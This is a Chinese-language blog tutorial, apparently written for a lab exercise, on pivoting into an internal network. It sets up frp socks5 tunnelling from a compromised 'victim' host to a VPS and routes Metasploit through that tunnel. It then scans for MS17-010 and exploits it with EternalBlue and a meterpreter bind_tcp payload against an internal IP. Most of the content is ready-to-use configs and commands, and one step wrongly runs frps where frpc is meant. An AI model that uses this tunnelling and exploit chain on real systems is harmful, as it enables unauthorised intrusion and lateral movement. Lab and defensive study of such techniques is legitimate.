0x01 前言

当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前不懂代理的时候,总是不找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。
初级–》frp代理了解
进阶–》多层代理

0x02 靶场环境

靶场搭建

0x03 frp简易配置

frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序,
下载地址

https://github.com/fatedier/frp/releases/tag/v0.38.0

一、frps.ini 配置

1、很多时候,我们都是用腾讯云,或者阿里云进行搭建frp 的服务端,所以这时候,我们需要开启开启对应配置端口防火墙通过,我一般是全部开启的,但我这个环境是用kali进行搭建,所以这步,进行略过,下面我们上代码

[common]
bind_addr = 0.0.0.0        # 设置监听的ip ,一般是你的外网ip,0.0.0.0表示都监听
bind_port = 8000           # 监听的端口,等待客户端连接 
dashboard_addr = 0.0.0.0   # frp网站服务器的ip,可以访问登录
dashboard_port = 7600       # frp网站服务器的端口,可以访问登录
dashboard_user = root       # frp网站服务账号
dashboard_pwd  = 123456    # frp网站服务密码
token = 1q2w3e             # 客户端的连接密码
heartbeat_timeout = 90     # 连接超时的时间
max_pool_count = 5		   # 允许连接的客户端数量

2、然后在vps 上执行
sudo ./frps -c ./frps.ini
在这里插入图片描述

这时候可能会报错,这是以为有些linux 是不支持 # 号符注释的, 要把上面的# 注释去掉。

3、然后访问vps ip 加7600端口,可以看到我们搭建的frp网站情况。
在这里插入图片描述

二、frpc.ini 配置

1、当我们拿到一台主机的shell,我们就要上次对应的frpc 文件进行流量代理,
frpc.ini配置

[common]
tls_enable = true
server_addr = *.*.*.*         # vps 服务器地址 
server_port = 8000          # vps服务器监听地址
token = 1q2w3e              # 设置的密码 ,设置完流量加密,不好解。      
pool_count = 5            # 将提前建立连接,默认值为 0
protocol = tcp              # 通信方式
health_check_type = tcp    # frpc 将连接本地服务的端口以检测其健康状态
health_check_interval_s = 100   # 健康检查时间间隔
[proxies]
remote_port = 6000  # 把流量转发到vps 那个端口 ,这个是重点等下会用到
plugin = socks5        #plugin 表示为插件 
use_encryption = true   
use_compression = true

2、然后在受害者主机上执行

sudo ./frps -c ./frps.ini
在这里插入图片描述

出现 success 说明连接成功

0x04 msf设置

一、代理配置

1、首先启动msf
msfconsole

2、设置代理msf的代理为127.0.0.1的6000端口,这个是刚才remote_port 会用到的端口

setg Proxies socks5:127.0.0.1:6000

在这里插入图片描述

3、允许反向连接
set ReverseAllowProxy true

二、ms17-010攻击

1、扫描ms17-010 漏洞

search msf17-010
use auxiliary/scanner/smb/smb_ms17_010  # 选择扫描模块
show options  # 查看模块配置
set rhost 10.0.1.7 # 选择攻击ip
run  

下图,表面存在该漏洞。
在这里插入图片描述

2、利用pyload 进行攻击

search msf17-010
use exploit/windows/smb/ms17_010_eternalblue  # 结果测试,这个工具链的成功率会比较大
show options   #查看配置
set payload windows/x64/meterpreter/bind_tcp     
# 设置正向连接,因为目标在内网,所以需要设置成正向连接目标主机才能执行成功。
set  rhost 10.0.1.7
run

在这里插入图片描述

msf拿shell后进入交互模式,发现乱码
在这里插入图片描述
输入chcp 65001

0x05 总结

之所以用msf 进行永恒之蓝漏洞,是因为用其他脚本的利用失败率很高,所以现在大部分还是选择msf进行利用。

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐